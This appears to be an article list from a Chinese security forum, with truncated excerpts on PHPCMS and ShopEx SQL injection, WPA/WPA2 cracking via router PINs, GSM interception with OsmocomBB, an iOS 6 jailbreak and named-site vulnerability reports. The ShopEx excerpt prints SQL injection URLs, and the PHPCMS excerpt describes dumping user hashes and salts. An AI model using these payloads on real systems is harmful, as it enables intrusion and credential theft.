文章列表
T00ls新年礼物之三:Phpcms V9 短消息回复SQL注入
modules/message/index.phppublic function reply() {if(isset($_POST)) {$messageid = intval($_POST);//判断当前会员,是否可发,短消息.$this->message_db->messagecheck($this->_userid);//检查此消息是否有权限回复 $this->check_user($messageid,'to'); $_POST = $this->_username;$_POST = SYS
GSMMAP Project --OsmocomBB
BB项目大概很多人都知道,2010年Chaos Communication Congress大会上,德国黑客宣布已经破解GSM算法,他们推出了OsmocomBB项目。黑客在演示的时候用了4台Moto的手机和一台运行着Gnuradio的笔记本,在几秒钟之内截取了附近GSM网络用户经过加密的短信和通话内容。太过于基础都我就不讲了,毕竟这不是一篇
日本顶尖黑客被通缉:悬赏高达300万日元
这是一个非常特别的悬赏通缉令,在上面你看不到嫌疑人的照片,而仅仅是一些描述:他善于使用C#编程语言、“iesys.exe”病毒以及使用一种被称为“西伯利亚”邮局的技术在日本的BBS发布匿名的信息。而且悬赏高达300万日元——相当于20万人民币。 显然,他们在通缉一个黑客,这个黑客被指控去年夏天通过他
等待结束!iOS 6完美越狱正式发布
又是年关将近,又是完美越狱,一切都是如此熟悉,只不过这一次的焦点不再是绿毒,而是“3P 肌肉男”。北京时间 2013 年 2 月 5 日凌晨 1 点,由 pod2g、planetbeing、pimskeks、肌肉男四名黑客组成的“evad3rs”团队发布了 iOS 6 完美越狱工具 evasi0n,今年春节大家又可以随心所欲的鼓捣自己心爱的手
PhpCms V9 info[birthday]注入利用
既然官方已经确认了,那就发一下所谓的EXP吧。权当交流,大家测试即可,请勿用于非法。注册后登录,找到个人资料,修改生日,拦截数据包或者直接firebug找到info,将其修改如下:info即可爆出username+hash+salt 。能不能破解出来就看诸位RP了。
WPA/WPA2密码破解&如何无视管理员更改无线密码&手工破解WPA/WPA2密码
说明:前两天看到论坛有人发了一篇社人邮箱思路的文章,大概讲的是通过给对方发一个无线路由,然后扫无线密码,嗅探之...其中还有密码破解被骗500的事情,看来也有朋友对无线路由破解这一块不是很了解,就有了这篇文章...本教程针对的是wpa/wpa2加密的无线路由,技术点是每个路由独一无二的PIN码,PIN
珍爱网(zhenai.com) 存储型跨站漏洞
珍爱网(zhenai.com) 存储型跨站漏洞
有史以来最伟大的黑客T恤
北京时间2月4日消息,在一年一度的世界黑客大会上,几乎每个与会黑客都穿着一件T恤,而且这些T恤大多是黑色的。黑客们对T恤有一种特别的感情。有一些黑客T恤仅仅是一件T恤。另一些黑客T恤则相当于黑客证书,这不仅是因为T恤本身,也因为这些T恤试图传递的某种信息。 大多数黑客T恤都试图说点什么。
T00ls新年礼物之二:shopex通杀SQL注入两处
http://www.x.cn/index.php?comment-822'/**/and/**/'1'='1-ask-commentlist.htmlhttp://www.x.com/comment-8967'/**/and/**/ExtractValue(0x64,concat(0x01,(select/**/@@version)))/**/order/**/by/**/'1-ask-commentlist.htmlhttp://www.x.cn/index.php?comment-822'/**/and/**/'1'='1-ask-commentl
天涯社区(tianya.cn)分站 上传漏洞
天涯社区(tianya.cn)分站 上传漏洞
